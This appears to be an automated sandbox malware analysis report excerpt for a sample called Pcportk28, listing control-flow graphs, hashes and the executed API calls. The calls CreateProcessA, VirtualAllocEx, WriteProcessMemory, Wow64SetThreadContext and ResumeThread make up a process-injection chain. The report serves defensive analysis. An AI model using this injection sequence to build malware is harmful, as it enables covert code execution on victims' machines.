WriteProcessMemory 7435->7437 7436->7313 7437->7435 7439 9e1d9d 7438->7439 7440 9e19b2 7439->7440 7441 35f6a0 WriteProcessMemory 7439->7441 7440->7313 7441->7439 7443 9e1d9d 7442->7443 7444 9e19b2 7443->7444 7445 35f6a0 WriteProcessMemory 7443->7445 7444->7313 7445->7443 7447 35fabf CreateProcessA 7446->7447 7449 35fd1d 7447->7449 7451 35f6ec WriteProcessMemory 7450->7451 7453 35f78b 7451->7453 7455 35f491 Wow64SetThreadContext 7454->7455 7457 35f50f 7455->7457 7457->7357 7458 9e2128 7457->7458 7462 9e2117 7457->7462 7459 9e2142 7458->7459 7466 35f358 7459->7466 7463 9e2142 7462->7463 7465 35f358 ResumeThread 7463->7465 7464 9e2171 7464->7357 7465->7464 7467 35f39c ResumeThread 7466->7467 7469 35f3ee 7467->7469 7469->7357 7471 35f84c ReadProcessMemory 7470->7471 7473 35f8ca 7471->7473 7473->7375 7475 9e2072 7474->7475 7482 35f578 7475->7482 7479 9e2072 7478->7479 7481 35f578 VirtualAllocEx 7479->7481 7480 9e20ad 7480->7398 7481->7480 7483 35f5bc VirtualAllocEx 7482->7483 7485 35f63a 7483->7485 7485->7398

                                                Executed Functions

                                                Function 00356479, Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 192 356479-3564b7 193 3564ec-356523 192->193 196 3566cd-35673d 193->196 197 356529-356536 193->197 201 35675f-356764 196->201 197->196 198 35653c-356542 197->198 199 3564b9-3564bc 198->199 202 3564c5-3564d9 199->202 203 3564be 199->203 214 35673f-356742 201->214 202->196 233 3564df-3564ea 202->233 203->193 203->202 204 356685-35668e 203->204 205 356547-356554 203->205 206 356631-35664c call 354968 203->206 207 3566b3-3566ba 203->207 208 356583-356592 203->208 209 35656f-356576 203->209 210 356699-3566a3 203->210 211 3565a8-3565b7 203->211 212 356678-356680 203->212 213 35666b-356673 203->213 204->196 220 356690-356694 204->220 205->196 223 35655a-35656a 205->223 246 35664e 206->246 247 356658-35665e 206->247 235 3566c2-3566cc 207->235 208->196 215 356598-3565a3 208->215 237 356580 209->237 221 3566a5 210->221 222 3566af-3566b1 210->222 211->196 219 3565bd-3565da 211->219 212->199 213->199 216 356744 214->216 217 35674b-35675d 214->217 215->199 216->201 216->217 225 356814-356825 216->225 226 3567a7-3567a9 216->226 227 356766-356775 216->227 228 356841-356846 216->228 229 3567b3-3567bf 216->229 230 3567ac-3567b1 216->230 231 35684b-35684f 216->231 232 35687b-356880 216->232 217->214 219->196 251 3565e0-356604 219->251 220->199 234 3566aa 221->234 222->234 223->199 238 356827-35682b 225->238 239 35682c-35682e 225->239 226->230 244 356777-35677e 227->244 245 356792-356796 227->245 228->214 252 356885-3568fb 229->252 263 3567c5-3567d6 229->263 230->214 240 356851-35685a 231->240 241 356870 231->241 232->214 233->199 234->199 237->208 238->239 249 356830 239->249 250 35683a-35683f 239->250 256 356861-356864 240->256 257 35685c-35685f 240->257 254 356873-35687a 241->254 244->252 255 356784-35678b 244->255 245->252 253 35679c-3567a5 245->253 259 356653 246->259 247->196 248 356660-356669 247->248 248->259 260 356835 249->260 250->228 250->260 251->196 270 35660a-356617 251->270 268 35691d-356928 252->268 269 3568fd-356900 252->269 253->226 262 356790 253->262 255->262 261 35686e 256->261 257->261 259->199 260->214 261->254 262->214 263->252 264 3567dc-3567ef 263->264 264->252 267 3567f5-35680f 264->267 267->214 274 356a14-356a1e 268->274 275 35692e-356939 268->275 271 356902 269->271 272 356909-35691b 269->272 270->196 273 35661d-35662c 270->273 271->268 271->272 276 356976-356991 271->276 277 3569f6-356a0a 271->277 278 3569c1-3569d1 271->278 279 3569b2-3569ba 271->279 280 356a0d-356a0f 271->280 281 35696c-356974 271->281 282 3569ef-3569f1 271->282 283 35693b-35694a 271->283 272->269 273->199 275->269 276->274 296 356997-3569a5 276->296 285 3569d3 278->285 286 3569dd-3569e0 278->286 279->278 280->269 281->269 282->269 288 356953-356959 283->288 289 35694c 283->289 293 3569d8 285->293 286->274 295 3569e2-3569ed 286->295 288->274 292 35695f-35696a 288->292 290 356951 289->290 290->269 292->281 292->290 293->269 295->282 295->293 296->274 297 3569a7-3569ad 296->297 297->269
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9eabb620b21a86cf27b5ff0bd177388c09f86742e0a7f35ee01644a3a264315
                                                • Instruction ID: b2f47aa4e75059afa2f4f7dd08255886fd2a956e5dbc64cea06c94b0fb77ecb5
                                                • Opcode Fuzzy Hash: e9eabb620b21a86cf27b5ff0bd177388c09f86742e0a7f35ee01644a3a264315
                                                • Instruction Fuzzy Hash: 46B1E770E04145CFDB02CF68C452EAEBBF1EF49301F5585AAE825EB6A2D3349D49CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00354368, Relevance: .3, Instructions: 275COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 372 354368-354372 373 354377-35437a 372->373 374 354383-3543c5 373->374 375 35437c 373->375 448 3543ca call 3545f0 374->448 449 3543ca call 354359 374->449 450 3543ca call 354368 374->450 451 3543ca call 354488 374->451 375->374 376 3543d7-354429 call 35487e call 354f41 call 355a91 call 356479 call 356bc8 call 356c00 375->376 377 354453 375->377 391 354461-3544bc 376->391 392 35442b-35443e 376->392 380 35445a-35445e 377->380 387 3543d0-3543d5 387->373 396 3544de-3544e3 391->396 392->391 395 354440 392->395 452 354443 call 357d30 395->452 453 354443 call 357cda 395->453 397 3544be-3544c1 396->397 399 3544c3 397->399 400 3544ca-3544dc 397->400 398 354449-35444e 398->373 399->396 399->400 401 3544e5-3544f4 399->401 402 3545a7-3545ac 399->402 403 354556-354567 399->403 404 354520 399->404 405 354523-354528 399->405 406 354588-35458c 399->406 407 35459a-3545a4 399->407 408 35452a-354544 399->408 400->397 410 3544f6-3544fd 401->410 411 354510-354514 401->411 402->397 414 35456e-354570 403->414 415 354569-35456d 403->415 404->405 405->397 412 3545b1-354620 406->412 413 35458e-354595 406->413 408->412 425 354546-354551 408->425 410->412 418 354503-354509 410->418 411->412 419 35451a-35451e 411->419 426 354625-354628 412->426 413->397 416 354572 414->416 417 35457c-354580 414->417 415->414 421 354577 416->421 417->412 422 354582-354586 417->422 423 35450e 418->423 419->423 421->397 422->421 423->397 425->397 427 354631-354636 426->427 428 35462a 426->428 427->426 428->427 429 354670 428->429 430 354653-35465d 428->430 431 3546bd-3546c1 428->431 432 3546de-3546e5 428->432 433 354678-354686 428->433 434 354638-354643 428->434 429->433 437 354663-35466e 430->437 438 3546e8-3546ee 430->438 431->438 440 3546c3-3546ce 431->440 433->438 439 354688-354696 433->439 435 354645 434->435 436 35464c-354651 434->436 441 35464a 435->441 436->441 437->426 439->438 442 354698-3546ae 439->442 440->438 443 3546d0-3546d9 440->443 441->426 442->438 445 3546b0-3546b8 442->445 443->426 445->426 448->387 449->387 450->387 451->387 452->398 453->398
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e6da73bff3b656b0fcab01994815903547a9315b193935affcba0c88fe06cdb
                                                • Instruction ID: 136ee4a50d7e022654be7625bc7485ad5e7c5bb73db67e2ebbbaf294fb5baffa
                                                • Opcode Fuzzy Hash: 1e6da73bff3b656b0fcab01994815903547a9315b193935affcba0c88fe06cdb
                                                • Instruction Fuzzy Hash: 4FA12974A082508FC71A8B64D804BAD7BF1EF4730AF15857AE856CBAB2D734C8C9C752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E11AB, Relevance: .2, Instructions: 224COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f1811cadabdb2b536299cf1ae487cfe661789c182899e01a180ff85fdcb5a2c
                                                • Instruction ID: 5c3dd9eb77c269b550ca9d4912aedb4a6b78d05ec77f2e2138340ffdd3632410
                                                • Opcode Fuzzy Hash: 0f1811cadabdb2b536299cf1ae487cfe661789c182899e01a180ff85fdcb5a2c
                                                • Instruction Fuzzy Hash: 6EB10074D002698FDB25CF66C884BEDBBB2AF89304F2085EAD509A7291DB305EC5CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00356720, Relevance: .2, Instructions: 221COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3df3eaed8db627152d0917606917e5fd6a42b0eac8fd444f2ab17df4e4e5cb3c
                                                • Instruction ID: 07a9ae0dcd7708cd858469a21fb7c05db74009b340b869331ea40d3585658c7b
                                                • Opcode Fuzzy Hash: 3df3eaed8db627152d0917606917e5fd6a42b0eac8fd444f2ab17df4e4e5cb3c
                                                • Instruction Fuzzy Hash: A6914570E08245CFC702CF78C851AAEFBB5AF49306F55856BD865E76A1C338D849CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00356C00, Relevance: .2, Instructions: 192COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d798e2b9819cc616e26d5ec07d6367bced3663d9af21582b8beed23352f549e
                                                • Instruction ID: 3a422a80f05141c3e63b524bafd605a194131d698ef7567d66b99376238f5c71
                                                • Opcode Fuzzy Hash: 6d798e2b9819cc616e26d5ec07d6367bced3663d9af21582b8beed23352f549e
                                                • Instruction Fuzzy Hash: 9D712A749086448FC712CF78C882ABEBBF4EF49312F55856BD896D76B1C3349909CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00356226, Relevance: .2, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e92795e9417c71fc2941d439f5f8158f86cc337a498c8b522f0b909b1ccfe700
                                                • Instruction ID: 5f34fb19dbf965521e79f0ad34967085c176d6d5f043e99d62d9e8bb10e91f09
                                                • Opcode Fuzzy Hash: e92795e9417c71fc2941d439f5f8158f86cc337a498c8b522f0b909b1ccfe700
                                                • Instruction Fuzzy Hash: 0B613871A08244CFC702CF68D851EA9BBB1BF41312F9985BBD855DB2F2C7349909DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0035FA38, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 35fa38-35fad1 2 35fad3-35faea 0->2 3 35fb1a-35fb42 0->3 2->3 8 35faec-35faf1 2->8 6 35fb44-35fb58 3->6 7 35fb88-35fbde 3->7 6->7 18 35fb5a-35fb5f 6->18 16 35fc24-35fd1b CreateProcessA 7->16 17 35fbe0-35fbf4 7->17 9 35fb14-35fb17 8->9 10 35faf3-35fafd 8->10 9->3 13 35fb01-35fb10 10->13 14 35faff 10->14 13->13 15 35fb12 13->15 14->13 15->9 36 35fd24-35fe09 16->36 37 35fd1d-35fd23 16->37 17->16 25 35fbf6-35fbfb 17->25 19 35fb61-35fb6b 18->19 20 35fb82-35fb85 18->20 22 35fb6d 19->22 23 35fb6f-35fb7e 19->23 20->7 22->23 23->23 26 35fb80 23->26 27 35fbfd-35fc07 25->27 28 35fc1e-35fc21 25->28 26->20 30 35fc09 27->30 31 35fc0b-35fc1a 27->31 28->16 30->31 31->31 33 35fc1c 31->33 33->28 49 35fe19-35fe1d 36->49 50 35fe0b-35fe0f 36->50 37->36 51 35fe2d-35fe31 49->51 52 35fe1f-35fe23 49->52 50->49 53 35fe11 50->53 55 35fe41-35fe45 51->55 56 35fe33-35fe37 51->56 52->51 54 35fe25 52->54 53->49 54->51 58 35fe47-35fe70 55->58 59 35fe7b-35fe86 55->59 56->55 57 35fe39 56->57 57->55 58->59
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0035FCFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: 9lz$ 9lz
                                                • API String ID: 963392458-3733230081
                                                • Opcode ID: 12418c09f50dd034d837ce91df6677b9cc6579a09e946567839b794b8555e898
                                                • Instruction ID: 8d8416fd4bbbf3e27f9f30e8778a08ba04159720083b928b05008af050950f11
                                                • Opcode Fuzzy Hash: 12418c09f50dd034d837ce91df6677b9cc6579a09e946567839b794b8555e898
                                                • Instruction Fuzzy Hash: 01C13270D002298FCB21CFA4C845BEDBBB1BF49304F1195A9D909B7250EB749A89CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0035F6A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 63 35f6a0-35f70b 65 35f722-35f789 WriteProcessMemory 63->65 66 35f70d-35f71f 63->66 68 35f792-35f7e4 65->68 69 35f78b-35f791 65->69 66->65 69->68
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0035F773
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID: 9lz
                                                • API String ID: 3559483778-3545502388
                                                • Opcode ID: d09eec3b6145314dc689ba942fd1fc493d2c44bc957b8defed105d18f4188cd4
                                                • Instruction ID: 07aac67511ffa8f644a0cdca7404179d608959d7e8866f16e6198403cc9661fc
                                                • Opcode Fuzzy Hash: d09eec3b6145314dc689ba942fd1fc493d2c44bc957b8defed105d18f4188cd4
                                                • Instruction Fuzzy Hash: B4419AB4D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D775AA45CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0035F800, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 74 35f800-35f8c8 ReadProcessMemory 77 35f8d1-35f923 74->77 78 35f8ca-35f8d0 74->78 78->77
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0035F8B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID: 9lz
                                                • API String ID: 1726664587-3545502388
                                                • Opcode ID: 73ab73e9d9ff754a332e085d116d56c61bc4458a6bc50b4aa51805a817d64002
                                                • Instruction ID: d762028488a033a6dea5ac16d69c21553a7b8274043f71695e6303563e8e88c3
                                                • Opcode Fuzzy Hash: 73ab73e9d9ff754a332e085d116d56c61bc4458a6bc50b4aa51805a817d64002
                                                • Instruction Fuzzy Hash: DC4199B5D042589FCF10CFA9D884AEEFBB1BF49314F20942AE814B7250D735A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0035F578, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 83 35f578-35f638 VirtualAllocEx 86 35f641-35f68b 83->86 87 35f63a-35f640 83->87 87->86
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0035F622
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: 9lz
                                                • API String ID: 4275171209-3545502388
                                                • Opcode ID: 0f8e45eec6c663cbf54cd47b24813fa8b9ba1d54b939d6901df255c79a8dda26
                                                • Instruction ID: 542ad5dbe765b52e507939c721654a45146f6af351851c131d57b48921b9293b
                                                • Opcode Fuzzy Hash: 0f8e45eec6c663cbf54cd47b24813fa8b9ba1d54b939d6901df255c79a8dda26
                                                • Instruction Fuzzy Hash: 6A4199B8D002589FCF10CFA9E884ADEFBB1BB49314F20942AE815B7310D735A905CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0035F448, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 92 35f448-35f4a8 94 35f4bf-35f50d Wow64SetThreadContext 92->94 95 35f4aa-35f4bc 92->95 97 35f516-35f562 94->97 98 35f50f-35f515 94->98 95->94 98->97
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0035F4F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID: 9lz
                                                • API String ID: 983334009-3545502388
                                                • Opcode ID: b6d5a9914c64103b6793a429bf911ebf5d7d596c90e4e4ed7bed904ad858cdd6
                                                • Instruction ID: c98955c9e813fdf6c7cce186ce1979b60bf61083b3a28c5e1232267016e84a6d
                                                • Opcode Fuzzy Hash: b6d5a9914c64103b6793a429bf911ebf5d7d596c90e4e4ed7bed904ad858cdd6
                                                • Instruction Fuzzy Hash: 0441AEB4D012589FCB10CFA9D884AEEFBB1BF49314F24842AE414B7340D739A949CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0035F358, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 103 35f358-35f3ec ResumeThread 106 35f3f5-35f437 103->106 107 35f3ee-35f3f4 103->107 107->106
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0035F3D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID: 9lz
                                                • API String ID: 947044025-3545502388
                                                • Opcode ID: ea2c0d77cfbf59519998309e736c50bb50dce9c1dbae7609be30eb1fa2a2f554
                                                • Instruction ID: a06d3f4d4b1cb26656a6db2dfa0b6b2ba3a0223913ad9a2d06c64f36b9343522
                                                • Opcode Fuzzy Hash: ea2c0d77cfbf59519998309e736c50bb50dce9c1dbae7609be30eb1fa2a2f554
                                                • Instruction Fuzzy Hash: 8D31B9B4D012189FCF14CFA9E884AAEFBB4EF49314F24942AE814B7350DB35A905CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E1CCA, Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 150 9e1cca-9e1d48 call 35f6a0 153 9e1d4a-9e1d6a 150->153 154 9e1d6c-9e1d87 153->154 155 9e1d92-9e1d97 153->155 154->155
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (
                                                • API String ID: 0-3887548279
                                                • Opcode ID: ace0784d74d0040fbdeccdc99abaf8942012a62caf46ebc55bebd7d56e9f0d08
                                                • Instruction ID: b3b75e072091c22392c482a5f245aae09d7dc351c0bd05094a29823a2ef6245f
                                                • Opcode Fuzzy Hash: ace0784d74d0040fbdeccdc99abaf8942012a62caf46ebc55bebd7d56e9f0d08
                                                • Instruction Fuzzy Hash: A3210774A022299FDB64DF64CD94BEDBBB6BF49304F1485D8D618A7292C7319E81CF01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E0048, Relevance: .3, Instructions: 278COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 298 9e0048-9e0068 299 9e006f-9e00e3 298->299 300 9e006a 298->300 301 9e00fe-9e0102 299->301 300->299 302 9e0104-9e0115 301->302 303 9e00e5-9e00f7 301->303 304 9e011b-9e013a 302->304 305 9e0541-9e0547 302->305 303->301 306 9e00f9 303->306 318 9e013c-9e0169 304->318 319 9e016a-9e017d 304->319 307 9e0549 305->307 308 9e0550-9e0556 305->308 306->301 310 9e022a-9e022b 307->310 311 9e01f9-9e01fa 307->311 312 9e0336-9e0337 307->312 313 9e0266-9e02bc 307->313 314 9e0477-9e04bc 307->314 315 9e02c2-9e02dd 307->315 316 9e01f2 307->316 317 9e03d1-9e03d5 307->317 308->305 321 9e022c-9e0244 310->321 311->312 323 9e0338-9e0361 312->323 313->305 313->315 314->305 344 9e04c2-9e04d8 314->344 315->305 316->311 317->321 322 9e03db-9e040f 317->322 318->319 334 9e017e-9e01ae call 9e0634 call 9e07a8 call 9e0808 319->334 321->305 351 9e01ff-9e0224 322->351 352 9e0415-9e041d 322->352 323->305 333 9e0367-9e036b 323->333 337 9e0425-9e0439 333->337 338 9e0371-9e038c 333->338 358 9e01b4-9e01df 334->358 341 9e043b-9e044f 337->341 342 9e0450-9e0464 337->342 354 9e0424 338->354 355 9e0392-9e03ac 338->355 341->342 342->334 348 9e046a-9e0472 342->348 344->323 356 9e04de-9e04e6 344->356 348->305 348->314 351->305 351->310 352->305 354->337 355->305 360 9e03b2-9e03cb 355->360 356->305 363 9e055a-9e056e 358->363 364 9e01e5-9e01ed 358->364 360->305 360->317 365 9e05fc-9e0602 363->365 366 9e0574-9e0581 call 9e0c19 363->366 364->305 367 9e0587-9e058f 366->367 367->305
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68a3fa55f2f2b27e49ac18b94f45ffc6ab6c54d4ef9572754c479066d9fd6942
                                                • Instruction ID: 1676909c09ba78bd5b88c4bde523575f6a4083bd7b59a3c3e1f7c2466a011b6c
                                                • Opcode Fuzzy Hash: 68a3fa55f2f2b27e49ac18b94f45ffc6ab6c54d4ef9572754c479066d9fd6942
                                                • Instruction Fuzzy Hash: 88C1F470D05218CFDB25DFA5D948BEEBBB5BB49305F1094A9D009A3290DBB45EC5CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E0006, Relevance: .2, Instructions: 244COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 115f232583e6bdf943eccc4c4dc0d6883a8f3124eecf4e4d3671fe3f4e07c7ba
                                                • Instruction ID: 05d8bd1d279cf349789d637df9ebae4d37ac8dc538459d1aac1c69b2bedab18d
                                                • Opcode Fuzzy Hash: 115f232583e6bdf943eccc4c4dc0d6883a8f3124eecf4e4d3671fe3f4e07c7ba
                                                • Instruction Fuzzy Hash: 37B13570D05258CFEB25CF65D858BEEBBB0BF49305F1085A9D009A72A1DBB85E89CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E0808, Relevance: .2, Instructions: 177COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b976c8f7772b159292e129d2b6eca7af384b189b302741f02fcbd48be67b564
                                                • Instruction ID: 620a925054f43f0fa74cd67d8fea4b485fd0e8620928034ca62a5f42d8443f89
                                                • Opcode Fuzzy Hash: 9b976c8f7772b159292e129d2b6eca7af384b189b302741f02fcbd48be67b564
                                                • Instruction Fuzzy Hash: C56104B4E05259CFDB04CFEAC584AAEFBF5BF88304F248919D415A7256C7749C81DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E02E2, Relevance: .2, Instructions: 151COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b113868a7364e2fd66a17b719930f11905dacd123016a3dc067582b854fa7222
                                                • Instruction ID: 5ce547f19e7d15694753318156783bc7a96a80e4eb9aace74a73f2bdb580724f
                                                • Opcode Fuzzy Hash: b113868a7364e2fd66a17b719930f11905dacd123016a3dc067582b854fa7222
                                                • Instruction Fuzzy Hash: 9D510270C05258CFDB25DFA5C988BEDBBB4BB49305F2054A9D009A7291DBB49A84CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E120E, Relevance: .1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fdc3f5c3bb0ce1bc42c59f1f94b7fd1b86747d27ebaa3d2e942be3d55a929711
                                                • Instruction ID: e9686c8f3cc14554e16256cf23217937a040c43f530420fa77af42d640125b88
                                                • Opcode Fuzzy Hash: fdc3f5c3bb0ce1bc42c59f1f94b7fd1b86747d27ebaa3d2e942be3d55a929711
                                                • Instruction Fuzzy Hash: 5251FE74D402698FDB25CF65CC84BE9B7B1BB89304F2086EAD509A6250EBB45EC5CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E0634, Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29e6825350023322739b7bf0cb809f0c72e0a966175c69450378c16f4cb16ced
                                                • Instruction ID: a623f62b4616413ae7f56b6d69559dff09d8ed31fc3d4c3e8b32acd0261a2909
                                                • Opcode Fuzzy Hash: 29e6825350023322739b7bf0cb809f0c72e0a966175c69450378c16f4cb16ced
                                                • Instruction Fuzzy Hash: 8C31B074D052898FCB02CBA5C8546EDBFB1EF8A300F1885AAC441A7252D7759D86CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

